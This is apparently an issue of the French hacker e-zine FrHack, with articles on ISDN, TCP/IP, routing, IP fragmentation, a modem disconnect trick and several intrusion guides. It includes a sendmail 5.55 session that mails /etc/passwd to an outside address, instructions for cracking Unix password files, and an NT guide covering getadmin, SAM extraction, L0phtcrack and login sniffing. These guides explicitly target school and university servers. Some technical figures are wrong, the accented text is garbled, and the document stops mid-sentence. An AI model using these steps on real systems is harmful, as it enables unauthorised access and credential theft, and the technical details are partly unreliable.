Buble

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


ISDN

Preface
Dans ce texte, je vais tent de vous inform sur le Integrated Systems
Digital Network (ISDN). Tout bon phreaker devrait savoir comment un tlphone
marche, donc Je vous explique. Les tlphones ont t invent pour que 
deux personnes puissent communiquer entre eux. Quand  vous parler 
dans le tlphone, votre voix fait vibrer un lment dans le microphone.
Ce dernier cre un changement de voltage qui s'envoie dans un autre tlphone.
Cette mme fluctuation de voltage va dans un amplificateur, qui ensuite fait vibr
un speaker , ce qui met un son. Ce signal est trs bon pour la communication 
de la voix, mais pas pour la communication de donnes informatiques.

Explication
Les ordinateurs utilisent des informations digitales, seulement ON et Off, au lieu
de fluctuation de voltage, pour envoyer/recevoir de l'information. ON et Off ne marche
pas trs bien sur les tlphones, c'est pourquoi on utilise un modem pour convertir 
les informations digitales en sons, avant que ca puisse tre envoyer par tlphone.

Les donnes convertit en forme analogique mne  beaucoup d'erreur caus par le son
ou d'autres problmes techniques. Mais avec de plus en plus d'informations en forme digitale,
les compagnies de tlphones ont dcider de prendre le ISDN. Au lieu de convertir les Fax et 
les donnes informatiques en sons, ces dernires ont dcid d'envoyer le tout en signal digital,
et la communication par voix aurait pu tre digitalise pour ensuite tre envoyer sur la mme 
sorte de ligne tlphonique. Le rsultat as t trs bon, moins d'erreurs, et une communication
de meilleure qualit et plus rapide.

The FrHack Crew
Snowcrach

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

L'article suivant est inspir d'un bug vieux (trs vieux) qu'un de mes amis (|\|emesis) ma expos 
rcemment.  Dans ma connerie habituelle, je n'en avait jamais entendu parler, mais c'est bel et 
bien un vieux bug.  J'ai dcid de le mettre ici parce qu'il est encore d'actualit et aussi parce 
que plusieurs nouveaux venus en info ne le connaissent pas.

Principe

Vous connaissez les commandes ATZ, ATDT, etc ?  Bon, ces commandes modem sont 
diffusables sur un rseau naturellement.  Qu'adviendrait-il si on
Les modems Hayes ou US Robotics sont faits de la manire qu'ils
doivent attendre un certains intervalle de temps entre la rception de la commande de 
raccrochage et son excution, et ceci, SANS recevoir d'autres donnes.  Cela est donc 
impossible sur un rseau  cause des en-ttes de packets.  Mais qu'arriverait-il si des 
compagnies n'avaient pas repris ce standards d'excution de commande, pour ne pas payer les 
frais de brevets? (et c'est le cas!)  Et bien, nous pourrions thoriquement faire dconnecter tout 
modem ne respectant pas le standards hayes/us robotics en envoyant la commande de 
dconnection.  Ces compagnies, ne voulant pas payer pour l'utilisation du brevet, on dcid 
d'enlever l'attente entre la rception de la commande de raccrochage et son excution - ce qui 
fait que la command est excute automatiquement, ce qui nous donne une personne qui se fait 
dcrocher du net...



Le comment faire

Si vous tes pas trop cons, a sera facile... Le tout est d'envoyer cette commande d'une faon 
ou d'une autre.  Mettre la commande dans une page web - en ctcp sur irc - dans un mail - etc! 
tada!



Problemes

Bon, pour toi ami quelque peu con, voici des explications (tient, a rime)
Primo, voici les conditions que tu devras respecter pour pouvoir dconnecter l'autre.
- Ta cible devra avoir un modem ne respectant pas le standards Hayes
- Tu ne devras pas avoir un modem ne respectant pas le standards Hayes (a moins    	que tu 
aies rassign la valeur de la commande de raccrochage de ton 	modem)
- Les connections pas cble ne seront pas touches - duhh
- Il serait donc prfrable que ton interface rseau soit ethernet... non!? ;0)



Protection

Deux solutions :
- Va acheter un modem Hayes/US Robotics
- Rassigne la valeur de la commande de raccrochage sur ton modem - cote sensiblement 
moins cher.


Alors si ya quelque chose que j'ai oubli, ou que j'ai de mal - oktober@beer.com !

The FrHack Crew
Oktober

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Exploit Sendmail

Mon premier article pour ce Emag, je le consacre aux exploits des sendmails. Pour ce 
# je vais juste vous copier un script qui permet d'exploiter un bug
sur le sendmail version 5.55. Il peut en effet vous permettre d'excuter
quelques commandes, et par le fait, peut-tre prendre le etc/passwd ?!?.
( Ceci est jusse une suggestion, n'essayer pas ca  la maison, ou du moins
demander assistance  papa ou maman). Bon, voici le script que j'ai 
trouv dernirement  quelque part sur Internet. Je continue. La version 5.55 
c'est vieux vous me direz ? Et puis ?? C'est quoi vous pensez qui font les vieux 
serveur linux de vos coles secondaire ?? Les profs sont tellement stupide qui nous donne accs 
au root en pensant qu'on veut faire nos devoirs . Tout ca pour dire que vous trouverez srement 
quelques  machines avec ces versions l. Maintenant voici comment s'y prendre : 

Supposons que vous voulez vol le passwd file d'une cible qu'on va nommer  u_suxx.com, voici 
le script que ca va donner ;

% telnet u_suxxx.com 25
 Trying 123.456.789.0...
 Connected to u_suxxx.com
 Escape character is '^]'.
 220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51
 mail from: "|/bin/mail me@myhost.com < /etc/passwd"
 250 "|/bin/mail me@myhost.com < /etc/passwd"... Sender ok
 rcpt to: je_suxxx_pas
 550 je_suxxx_pas... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit
 Connection closed by foreign host.
 %


Et n'oublier surtout pas, mangez pas des toasts en tappant vos textes pour 
FrHack, ca fait des graines dans le putain de clavier.  

The FrHack Crew
Ashmeu

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Fragment de Paquet TCP

Preface
Dans ce texte, je vais tent de vous expliqu comment fonctionne 
la fragmentation des paquets TCP, et galement comment vous en servir
pour en faire une attaque redoutable contre les firewalls et philtres de paquets.
La fragmentation fonctionne en permettant au datagram crer comme paquet 
simple  tre changer en plusieurs petits paquets pour la transmission et ensuite
tre rassembl au host qui les reoit.

Explication
La fragmentation de paquet est ncessaire car, mis  part le protocole IP, les autres
protocoles physiques ou logiques sont utiliss pour transport des paquets au travers
des rseaux. Un bon exemple de ce phnomne serait la diffrence entre un paquet
Ethernet (limit  1024 bytes) , un paquet ATM (limit  56 bytes) et les paquet IP 
qui ont une grandeur variable d' peu prs un demi million de bytes.

La seule exception  cette rgle est dans le cas d'un datagram marqu, qui ne vas pas 
se fragment donc. Nimporte quel datagram internet marqu ne vas pas se fragment
peu importe la circonstance. Si un datagram internet marqu ne peut pas se rendre 
une destination sans tre fragment, il vas tre perdu.

Le comment de l'attaque
Le mcanisme de fragmentation de paquet fait une attaque qui contourne les Firewalls
Internet, mais la raison du pourquoi que l'attaque fonctionne n'est pas la manire que
la fragmentation est fait, mais plutt de la manire que les datagrams sont rassembls.

Les datagrams sont supposs tre fragment en paquet qui laisse la portion du header du 
paquet intacte, except pour la modification du paquet et galement le remplissage d'un champ 
de Offset dans le header IP qui indique aux datagrams ou commencer. Dans le 
rassemblement, le 
rassembleur IP crer un paquet temporaire qui contient la partie fragmente du datagram et 
ajoute les fragments qui arrivent en plaant leur champ de donnes au Offset spcifique avant 
que le datagram soit rassembl. une fois le datagram rassembl, c'est vu comme si c'tait 
arriv en un seul paquet.

S'accordant  la spcification IP, les paquets fragments doivent tre rassembl au host qui les 
reoient. Ceci veut dire qu'ils ne sont pas supposs tre rassembl  un site intermdiare 
comme un routers ou un firewall. Cette dcison fut prise pour viter le rassemblage et la 
refragmentation dans les rseaux intermdiares.

La manire dont les Firewalls et les routers bloquent les services (comme telnet) ou en 
permetant d'autres (comme le HTTP) est en regardant dans le paquet IP pour dterminer 
quelle port Transfer Control Protocol (TCP) qui est dsign. Si le port 80 est dsign, le 
datagram est destin pour les services HTTP, ou 23 pour les services Telnet. Dans les datagram 
normal cela fonctionne bien, mais supposons que nous n'avons pas suivit les rgles de 
fragmentations du datagram et que l'on as modifier ce dernier, voici ce que ca donnerait et les 
tapes  suivre.

? Crer un paquet initiale qui dira qu'il est le premier paquet d'un datagram de multiple paquet. 
Spcifier le port TCP 80 dans le header TCP pour que ca ressemble  un datagram pour les 
services HTTP, et le firewall va le laisser passer.

? Le firewall laisse passer le paquet pour le host sous attaque et laisse galement passer 
quelques fragments de paquets en ordre pour permettre au host de destination de les 
rassembler.

? Un de ces paquets en fragments as un Offset de 0 ce qui cause au rassembleur  
overwriter la partie initiale du paquet IP. Ceci est la partie du paquet IP qui spcifie le port 
TCP. L'attaquant change la dfinition du port TCP de son paquet qui tait 80 au dbut pour 
le nouveau port qui est 23 admettons, et viens d'avoir accs au port 23 du host sous attaque 
car le firewall va croire que ce dernier paquet est pour les services HTTP.

The FrHack Crew
Snowcrach

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Piratage de Shell

* Vous avez access  un beau shell et vous n'aimez pas les propritaires, ben vous pouvez vous   
venger.

* Premirement vous allez dans /etc et vous examinez le fichier passwd sur le system (vrifiez     
pour les modifications... exemple passwd.OLD etc...).

-=[Vous devriez voir des rangs comme ca]=-

KhanAbyss:naVwowMManasMMo:10:200:Stefan Berube:/users/johnsmith:/bin/bash

    ^        ^             ^   ^          ^               ^             
    |        |             |   |          |               |             
    |        |             |   |          |               |               
    |        |             |   |          |               +---- Repertoire de lutlisateur
    |        |             |   |          +-------------------- Vrai nom
    |        |             |   +----------------------------------- Nombre du systeme
    |        |             +--------------------------------------- Niveau
    |        +----------------------------------------------------------- password cach (shadowed)
    +------------------------------------------------------------------------------------  Nom dutilisateur


[Nom dutilisateur] -le nom dutilisateur est le login avec lequel la personne se log sur le shell.
|
[Password cachs] -le password utilisateur (crackable),la cible.
|
[Niveau de lutilisateur] -dtermine quel niveau lutilisateur est et quelles fichiers il a accs |                          
etc....
|
[Nombre du systme] -un genre didentification pour le systme.
|
[Vrai nom] -le vrai nom de lutilisateur.
|
[repertoire de lutilisateur] -le rpertoire alou a lutilisateur normalement /home/son_login.

-=(Endroits (sur dautres systmes que linux 2.0.xx) ou sont ces fichiers passwd)=-

-Systme-----------------------Location-----------------------------------
AIX 3                       /etc/security/passwd                     !
       or                   /tcb/auth/files//
A/UX 3.0s                   /tcb/files/auth/?/                       *
BSD4.3-Reno                 /etc/master.passwd                       *
ConvexOS 10                 /etc/shadpw                              *
ConvexOS 11                 /etc/shadow                              *
DG/UX                       /etc/tcb/aa/user/                        *
EP/IX                       /etc/shadow                              x
HP-UX                       /.secure/etc/passwd                      *
IRIX 5                      /etc/shadow                              x
Linux 1.1                   /etc/shadow                              *
OSF/1                       /etc/passwd[.dir|.pag]                   *
SCO Unix #.2.x              /tcb/auth/files//
SunOS4.1+c2                 /etc/security/passwd.adjunct         ##username
SunOS 5.0                   /etc/shadow                            
System V Release 4.0        /etc/shadow                              x 
System V Release 4.2       /etc/security/* database
Ultrix 4                   /etc/auth[.dir|.pag]                      *
UNICOS                     /etc/udb   

-=(Pour cracker ses passwd)=-
Je vous conseille john the ripper jointe avec le fichier ci-dessous... ver:(unix,dos,win32)

The FrHack Crew
Khanabyss

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

RIP

Vous tes vous jamais demand comment un packet TCP/IP se rendait  destination? Pourquoi 
le spoofing tait possible? Alors vous vous tes questionn  propos des protocoles de routing 
internet.  Ce petit rsum tentera de rpondre  vos questions sur la base des protocoles 
disponibles pour le routing sur internet.


? RIP - Routing Information Protocol

Le RIP est un protocole qui cr et maintient automatiquement des routes pour les packets sur 
les rseaux.  Sans ce protocole, vous devriez mettre  jour chacune des tables de routing sur 
chacun des routers de ce rseau.  Imaginez le nombre de routers sur internet...  Avec le 
protocole RIP, si un router apprend que des changements on t fait dans la table de routing 
d'un de ses voisins, il change sa table personnelle et prvient les autres routers environnant d'en 
faire autant (on dirait presque que c'est vivant!)  Donc, si jamais une ligne vient  briser, ou un 
router  tre hors d'usage, les autres aux alentours tenteront de trouver un moyen de se sortir de 
l'impasse.  Notez qu'il est aussi possible de fixer manuellement des routes statiques, qui ne 
changeront pas.  Cependant, il n'est pas conseill de mlanger routing statique et dynamique.

Voici quelques bmols  l'efficacit du RIP :

- Impossibilit du RIP de connatre la vitesse de ses voisins routers.
- Il ne peut tre entour de plus de 15 routers.
- Il y a un certain dlai de rponse concernant les changements dans le rseau (ex. : advenant la 
crash d'un certain router)
- Il y a certains problmes de scurit, reli  l'authentification de packets (permettant le 
spoofing des packets TCP/IP).


? OSPF - Open Shortest Path First Protocol

Le protocol OSPF permet aux routers de s'changer des informations sur leur situation (leur 
vitesse, tat du systme,  quels autres routers ils sont connects, etc) et maintiennent une base 
de donnes complte de ces informations.  Ce protocol permet entre autres d'isoler des routers 
en disfonctionnement et permet aussi de calculer des routes rapides et ainsi d'optimiser la 
vitesse de transfert.  Aussi le OSPF possde un systme d'authentification 64 bits, permettant 
ainsi d'empcher un router non autoris de se connecter, donc plus de spoofage...  De plus, il 
permet facilement de passer d'un rseau  un autre, en utilisant un systme d'authentification 
trs flexible.


L'OSPF est encore au stade de dveloppement par le groupe de travail internet international 
(mauvaise traduction :-)  Internet Engineering Task Force) et est en voie de remplacer le RIP si il 
maintient ses promesses d'efficacits lors des tests.  Donc, le OSPF pour un net plus scure et 
plus rapide, alors que l'on patauge dans le lag  longueur de journe!

Cet article est trs court, c'est pourquoi je vous demande, si vous avez des questions, de me 
contacter  l'adresse suivante : oktober@beer.com je me ferai un plaisir de rpondre  vos 
questions!

The FrHack Crew
Oktober

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Fonctionnement d'Internet

Comment ca fonctionne l'internet?  Je vais essayer de dmystifier ca un peu c'est vraiment loin 
d'tre compliqu.  Bon premirement, sur l'internet (je ne vais pas vous expliquer l'histoire de 
l'internet ca serait trop long) on envoie les donnes par "packets".  C'est une faon parfaite et 
assure d'envoyer/recevoir des informations sans erreurs.  

Quand un ordinateur envoie une information (que ce soit un email, un message de chat, ou 
encore une page web) il la dcompose en plusieurs petites pices d'informations appeles 
datagrammes.  Ce sont les regroupements de datagrammes qu'on appelle packets.  Chaque 
datagramme est compos de l'information qu'il doit envoyer, de son adresse d'origine et de son 
adresse de destination (donc si vous voulez vous spoofer c'est aux packets que vous devez 
vous attaquer).  

? TCP

TCP signifie "Transmission Control Protocol".  C'est un moyen trs avanc de transmission sans 
erreur.  Le TCP permet de retrouver l'information qui est endommage, perdue ou quoiqu'il 
arrive comme erreur.  C'est trs simple.  L'ordinateur qui envoie l'information va l'envoyer via 
TCP et si jamais il ne reoit pas la confirmation que l'information est arrive a bon point (la 
confirmation s'appelle ACK) en un certain temps il renvoie l'information.  Alors disons qu'un 
packet a t endommag pendant son voyage, tait donn que l'ordinateur qui l'envoie ne 
recevra pas le ACK (quand un packet est endommag, l'ordinateur qui le reoit va l'effacer et 
n'envoie pas de ACK), il va renvoyer le packet, donc on ne peut pas perdre l'information.
Note:  TCP/IP est seulement la faon de spcifier que le TCP est utilis via l'internet (IP = 
Internet Protocol) donc c'est l'adresse IP des machines que les datagrammes contiennent.

? UDP

UDP signifie "User Datagram Protocol".  Il est trs diffrent du TCP.  Contrairement  celui-ci, 
l'UDP ne tient pas compte si les packets sont arrivs a destination ou pas.  Donc on l'utilise 
beaucoup moins que le TCP tant donn que il y a beaucoup de chances de tout recevoir les 
packets.  Ca parait bizarre comme ca mais c'est surtout utilis dans tout ce qui est en temps 
rel.  Disons que vous voulez couter CKOI en Real Audio. Vous allez recevoir l'information en 
UDP, vu que ce n'est pas vital si le son est moins bon ou si vous perdez 1 seconde.  Mais tant 
donn que l'UDP est plus rapide que le TCP on l'utilise partout ou on a pas besoin de prcision.

N.B.: Vous vous demandez srement ce que les protocoles internet ont a voir avec le hack, eh 
bien je vous donne ma rponse: Vous ne pouvez pas vous attaquer a l'internet sans en connatre 
ses moindres dtails, vous ne pouvez pas connatre ses points faibles si vous ne connaissez pas 
comment ca marche.

The FrHack Crew
Bismuth

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

TCP/IP

Bon, ok, on vient de m'apprendre que frhack est un magasine ducatif destin a faire 
comprendre les bases ncessaire  une volution dans la culture Underground. Je me propose 
donc de vous faire dcouvrir un protocole rseau universel, utilis par tous les systmes 
d'exploitations qui possdent une ouverture rseau. Aprs la lecture de cet article, ne vous ne 
serez pas en mesure de vous prtendre "Master of the Net", mais il vous aidera  mieux 
comprendre ce qu'il se passe sur le rseau quand vous recevez ou mettez des donnes. Je vais 
essayer d'tre le plus clair possible et blablabla ... blablabla, passons aux choses srieuses.


snip------- %<------------snip----------%<-----------------snip------------------------%<-----------

FONCTIONNALITES DE TCP/IP

TCP : Transmission Control Protocol
IP     : Inetnet Protocol

En raison de sa large diffusion, TCP/IP permet d'unifier diffrents matriels ou logiciel (mme 
sans accs  internet). TCP/IP est indpendant par rapport au matriel rseau physique, ce qui 
lui permet d'tre utilisable sur de nombreux types de rseau. TCP/IP possde un systme 
d'adressage commun permettant le dialogue avec tout matriel situ n'importe o sur le Rseau.

snip------- %<------------snip----------%<-----------------snip------------------------%<-----------

MODELE DE TRANSMISSION DE DONNES

Afin de pouvoir parler de rseau informatique, il faut utiliser certains termes qui possdent une 
signification bien particulire. Quelques bases sont donc ncessaire les mots employs dans les 
communications rseau.

	##########################
	#				 #
	# COUCHE APPLICATION     #
	#			       #
	##########################
	#				 #
	# COUCHE PRESENTATION    #
	#			       #
	##########################
	#			       #			
	# COUCHE SESSION         #
	#			       #
	##########################
	#			       #
	# COUCHE TRANSPORT       #	-----------------> Le Modle de rfrence
	#			       #			     OSI.
	##########################
	#			       #
	# COUCHE RESEAU	       #
	#			       #
	##########################
	#			       #
	# COUCHE LIAISON	       #
	#		             #
	##########################
	#			       #
	# COUCHE PHYSIQUE	       #
	#			       #
	##########################

COUCHE APPLICATION : La couche application constitue le niveau dans la hirarchie des 
protocoles o rsident les accs des processus rseau de l'utilisateur.

COUCHE PRESENTATION : Lorsque les applications cooprent entres elles, elles changent 
certaines informations. Elles doivent donc dterminer comment reprsenter ces donnes. Dans 
le modle OSI, cette couche fournit les routines de prsentation des donnes standardises. 
Cette fonction est souvent assure directement  l'intrieur de l'application, bien que de plus en 
plus de protocoles TCP/IP tels que XDR et MIME effectuent cette opration.

COUCHE SESSION : Comme pour la couche prsentation, cette couche n'est pas identifiable 
sous la forme d'une couche indpendante au niveau de la hirarchie TCP/IP. Cette couche gre 
les connexions entre les applications. Avec TCP/IP, cette fonction se ralise bien souvent dans la 
couche de transport et le terme de session n'est pas utilis. Pour TCP/IP, les termes "sockets" et 
"ports" sont utiliss pour dcrire la voie  suivre pour que les applications puissent communiquer 
entres elles.

COUCHE TRANSPORT : Cette couche du modle OSI garantit que le rcepteur reoit les 
donnes telles qu'elles ont t envoyes. Avec TCP/IP cette fonction est ralis avec TCP. 
Toutefois, TCP/IP offre un second service de transport, UDP (User Datagram Protocol) qui 
n'effectue pas les vrifications finale de bonne communication.

COUCHE RESEAU : Cette couche gre les connexion  travers le rseau et isole les protocoles 
des couches suprieure des dtails du rseau sous-jacents. Le protocole IP, qui isole les couches 
suprieures du rseau et qui gre les adresses ainsi que la transmission de donnes est 
gnralement dcrit comme la couche rseau TCP/IP.

COUCHE LIAISON : La possibilit de diffuser les donnes  travers le rseau physique sous-
jacent est gre par cette couche. TCP/IP cre trs rarement des protocoles situs dans cette 
couche.

COUCHE PHYSIQUE : Elle dfinit les caractristiques du matriel ncessaire  la propagation 
du signal. Par exemple, les niveaux lectriques, le nombre et la position des broches au niveau 
de l'interface sont dfinis dans cette couche.

snip------- %<------------snip----------%<-----------------snip------------------------%<-----------

ARCHITECTURE DES PROTOCOLES TCP/IP


TCP/IP est gnralement reprsent avec moins de couche que celle utilises dans le modle 
OSI. Le modle suivant fournit une reprsentation schmatique des couches de la hirarchie 
TCP/IP.

	#########################
	#			      #
	# COUCHE APPLICATION    #
	#	                  #
	#########################
	#				#
	# COUCHE TRANSPORT      #
	# MACHINE A MACHINE     #
	#			      #
	#########################
	#			      #
	# COUCHE INTERNET       #
	#			      #
	#########################
	#			      #
	# COUCHE RESEAU         #
	#			      #
	#########################


Comme dans le modle OSI, les donnes sont transmises vers le bas de la pile lorsqu'elles sont 
mises sur le rseau; et vers le haut de la pile lorsqu'il s'agit d'une rception de donnes. La 
structure  4 niveaux de TCP/IP est reprsent suivant la manire selon laquelle les donnes 
sont gres et transmise vers le bas de la pile de la couche application vers la couche rseau 
physique. Chaque couche de la pile ajoute certaines informations de contrles pour s'assurer de 
la bonne livraison des donnes. Ces informations sont appeles "en-ttes" car elles sont places 
avant les donnes  transmettre. Chacune des couches considre toutes les informations reu 
d'une couche suprieure comme tant des donnes et place sa propre en-tte juste avant. L'ajout 
successif d'informations a chacune des couches est appel "encapsulation". Lorsque des 
donnes sont reues, c'est le mcanisme inverse qui se met en place. Chaque couche retire son 
en-tte avant de communiquer les donnes  la couche suprieure. Comme les informations 
remontent les diffrentes couches, les informations reues de la couche infrieure de la pile sont 
interprtes comme tant constitues d'une en-tte et de donnes.

--------------------------------------------------------------------------------------------------------------
										___________
Couche application							| donnes |
										-----------
--------------------------------------------------------------------------------------------------------------
									_____________________
Couche transport							| en-tte | donnes |
									--------------------
--------------------------------------------------------------------------------------------------------------
							      _______________________________
Couche internet						| en-tte | en-tte | donnes |
							       ------------------------------
--------------------------------------------------------------------------------------------------------------
					      _________________________________________
Couche rseau				| en-tte | en-tte | en-tte | donnes |
					      ------------------------------------------
--------------------------------------------------------------------------------------------------------------

snip------- %<------------snip----------%<-----------------snip------------------------%<-----------

LA COUCHE RESEAU

La couche rseau est la couche la plus basse de la hirarchie des protocoles TCP/IP. Les 
protocoles de cette couche fournissent les moyens ncessaire au systme pour envoyer les 
donnes aux priphriques physique directement connects au rseau. Les fonctions raliss  
ce niveau incluent l'encapsulation de datagrammes IP dans des trames transmises sur le rseau 
et la correspondance entre adresse IP et adresse MAC. En effet, les adresses IP doivent tre 
converties en une adresse approprie pour le rseau physique  travers lequel le datagramme va 
circuler.


LA COUCHE INTERNET

La couche au-dessus de la couche rseau de la hirarchie des protocoles est la couche internet. 
IP constitue le coeur mme de TCP/IP et il s'agit du protocole le plus important de la couche 
internet. IP fournit le service de base en matire d'expdition de paquets sur lequel les rseaux 
TCP/IP sont btis.
Je publierais prochainement un article plus en dtail sur ce protocole; j'y exposerai le format d'un 
datagramme IP et tenterais de vous claircir l'esprit sur le routage de ces datagrammes.

LA COUCHE TRANSPORT

Les deux protocoles les plus importants dans cette couche sont TCP et UDP (User Datagram 
Protocol). TCP fournit un service de transmission de donnes dit fiable avec un systme de 
dtection et de correction d'erreurs. UDP fournit un service de transmission de datagramme en 
mode non connect.
UDP et TCP feront  eux seuls un excellent sujet d'articles pour un prochain numro de frhack.

LA COUCHE APPLICATION

Au sommet de la hirarchie des protocoles TCP/IP se trouve la couche application. Cette couche 
inclut tous les processus qui utilisent les protocoles de la couche transport pour transmettre de 
l'information. Il existe un grand nombre de protocoles applicatif de ce genre. La plupart 
fournissent des services utilisateurs et de nouveaux services sont rgulirement ajouts  cette 
couche.

Les protocoles applicatifs les plus connus sont :

	- Telnet : permet d'effectuer des login distants  travers le rseau (miam miam :-))

	- FTP : Utilis pour transfrer des fichiers d'une manire interactive ;-)

	- SMTP : Protocole de transport de mails (souvent bugg a mort afin de nous laisser 
entrer.)
	
	- HTTP : Permet de diffuser des pages web  travers le rseau.

	- DNS : Permet la rsolution des adresses IP en fonction du nom de machine. Par 
exemple, avec mIRC faites : /dns www.yahoo.com et vous obtiendrez l'IP du serveur de yahoo.

	- NFS : Permet aux fichiers d'tre partags par plusieurs machine connect au rseau 
(voir article dans frhack #1).


snip------- %<------------snip----------%<-----------------snip------------------------%<-----------

Bon voil, quand on vous parlera de TCP/IP vous saurez de quoi il s'agit, maintenant c'est  
vous d'tre imaginatif et de vous renseigner pour en savoir plus.
Merci de m'avoir lu, merci  Snowcrach de me faire confiance.
Je remercie Bubble (pas celui qui trane en ce moment sur #hack.fr) car c'est lui qui m'a tout 
appris, Je ne remercie pas les supermarchs GEANT CASINO qui m'ont vendus un PC de daube 
car en 4 mois, il a fallu que je change : le lecteur CD, l'alimentation et deux fois la carte mre 
!!!!!! N'achetez pas de matriel info  GEANT CASINO, je vous demande de boycottez cette 
enseigne. Je ne remercie pas Farce Telecom pour les tarifs encore trop cher de connexion  
internet.
Je remercie l'quipe de FrHack .
J'embrasse ma copine illona qui n'ai pas intress par le hacking et qui sait me ramener a la 
raison quand il se fait tard et que je suis encore devant mon cran.

The FrHack Crew
Kthulu

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

					  $$$$$$$$$$$$
					  		   		
					  	HaCk your Fac 2	
					  		   		
					  $$$$$$$$$$$$

						By Fedaikin


s0RC3Ry avait ecrit dans Noroute #1 un texte qui s'appellait "Fac Hak". 
Ce texte m'a enormement servi mais j'ai voulus aller plus loin. C'est 
pourquoi j'ai ecrit ce texte. Je vais suivre en quelques sortes les 
traces de s0RC3Ry puisque je vais tenter de vous expliquer comment 
passer root a votre fac (de quoi faire chier votre admin ;) 

Le materiel necessaire est :-Un account sur une becanne de la fac..
				    -Une becanne avec Unix et/ou NT.. (Si vous 
avez pas NT c'est pas la peine...)
                            -Une legere connaissance des OS..                         
				    -Une conscience..

Je vais vous expliquer comment obtenri les acces Admin de votre Fac sous 
NT .

Je vous conseille vivement de lire le texte de s0RC3Ry car il explique 
enormement de truc sur Unix et le compte ROOT qui sont les bases. Pour 
ma part je considere que vous les avez (j'en expliquerai tou de meme 
quelques une...)

I . Le Password Admin Local sous NT
	1. Details sur NT
	NT est en theorie un systeme d'exploitation beneficiant de la 
certification C2. Ce qui signifie qu'il est au plus haut point de 
securite possible des OS. J'ai bien dit en THEORIE ;)
	Il y a plusieurs composants tres interressants dans NT. Le 
LSA(Local Security Authority) qui gere les login et les audits. Le SAM 
(Security Account Manager) qui contient les passwords et les donnes au 
LSA. Enfin le SRM (Security Reference Monitor) qui genere les messages 
d'audits et renforce la securite du LSA.
	Qu'est-ce qu'un audit, vous me direz... Un audit et un executable 
que l'Admin lance sur certains fichier, programmes ou repertoires, et 
qui notte qui a utilise ce fichier et pendant combien de temps.
	Il n'y a pas que l'audit qui est tres chiant; y'a aussi les 
Service Packs... Ce sont des programmes qui sont crees par MS pour 
corriger des bugs dans NT qui pourraient constituer des trous de 
securitee. Au jour ou j'ecrit ce texte, le SP4 vient de sortir.

	2. Passwords sous NT
	Le password est contenu dans un fichier nomme SAM. Ce fichier 
existe en plusieurs exemplaires. Celui qui est utilise par NT est le 
fichier SAM (ou Sam.log) situe dans le repertoire 
WINNT\SYSTEM32\CONFIG\SAM. Le probleme est que ce fichier est utilise 
par NT et donc illisible avec NT demarre!!! Mais pas de probleme car NT 
est pas intelligent et a peur de le perdre; c'est pourquoi il le 
sauvegarde dans un fichier sam.sav. Il existe aussi le fichier Sam_ qui 
contient le pass Admin au moment de l'installation mais si l'admin est 
pas trop con il l'aura change....

	3. Passer Aministrateur sous NT en local
	Ca peut etre tres pratique pour installer des progs qui demandent 
d'etre Admin...
		a) La Solution Getadmin
	Pour passer root sous NT il y a plusieurs solutions biensur. La 
premiere est d'utiliser un exploit nomm Getadmin.exe. Le probleme est 
que cet exploit est patche par le Service Pack 3. Mais mais mais, il y a 
toujours une solution, elle se nomme Crash4.exe. Ce dernier programme 
est a utiliser si le SP3 est installe sur votre machine, il remet en 
place quelques trucs dans la pile de NT et autorise l'utilisation de 
Getadmin.exe. Comment savoir si le SP3 est installe? C'est tres simple, 
il vous suffit de le copier dans le repertoire  c:\temp (vous y avez les 
droits ;) avec son DLL GASYS.DLL et executez le en tapant getadmin GUEST 
(ou tout autre compte que vous voulez passer en root). Si ca marche pas 
de probleme sinon il vous faudra executer Crash4.exe et ensuite 
reexecuter Getadmin.
		b) L'extraction du fichier Sam
	Une autre solution bien plus amusante est de chopper le password 
Administrateur. Pour cela on va recuperer le fichier Sam... Le probleme 
est que ce fichier est utilise par NT et donc il est innaccessible. Il y 
a toute fois une solution. Elle consiste a booter sur une disquette 
(donc sous DOS) et de monter la partition NTFS grace a un programme cree 
par Rhino9 nomme ntfsdos.exe. Ce programme permet de monter la partition 
NTFS et donc de pouvoir lire dessus sans aucune restriction habituelle. 
On pourra donc recuperer le password Admin et le cracker ensuite. Mais 
avant il faut le dumper car il est code. Pour cela il faut utiliser 
Pwdump.exe ou Samdump.exe, le fichier est ainsi lisible (mais le pass 
est toujours crypte). Une autre solution pour le dumper est d'utiliser 
le cracker de passwords L0pthcrack. Vous devrez de toute facon passer 
par ce prog car c'est le meilleur cracker de pass NT que je connaisse.
Ca prendra surement du temps mais ca vaut le coup ;)

II . Le password Admin sur le reseau
	Pour ce pass faudra gruger un peu (reflechir en bon francais...). 
Comme vous le savais pour certains deja bien, je suis un fana du 
sniffing (voir frhack#1). On vas donc encore sniffer comme de vrai 
toxicos ;)
La config de votre reseau est tres importante vous vous en doutez. Le 
mieux c'est d'avoir un reseau Ethernet. Plusieurs solutions se 
presentent alors a vous : sniffer au moment du login ou sniffer au 
moment de la recuperation des mails.
Pour sniffer au login rien de plus simple, il vous suffira d'utiliser 
encore une fois L0phtcrack. Le dernier en date, le 2.51 l'integre 
graphiquement. c'est trop fun non??? Alors vous le lancez et vous 
attendez. Perso je n'ai pas teste la derniere version mais dans les 
versions precedentes leur prog readsmb marche tres bien, on peut donc 
esperer qu'ils n'ont pas regresse... Le probleme de ce systeme est que 
